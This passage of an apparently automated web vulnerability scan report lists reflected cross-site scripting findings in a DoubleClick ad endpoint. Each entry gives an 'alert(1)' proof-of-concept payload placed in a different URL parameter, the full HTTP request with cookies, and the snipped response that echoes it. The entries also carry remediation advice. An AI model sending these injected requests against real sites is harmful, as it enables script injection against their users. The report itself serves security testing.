User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:14 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
t = '';
var dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26
...[SNIP]...

1.94. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4efc"-alert(1)-"09524b1daae was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.95. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef7"-alert(1)-"e411786e44c was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "
...[SNIP]...

1.96. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebf06"-alert(1)-"f9932b774ce was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:54 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
07-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscri
...[SNIP]...

1.97. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee414"-alert(1)-"0759993d50b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:28 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.98. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee567"-alert(1)-"51b02d198a9 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

1.99. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c823"-alert(1)-"7422a3948b0 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:07 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

1.100. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 870d7"-alert(1)-"e17bcc3401c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
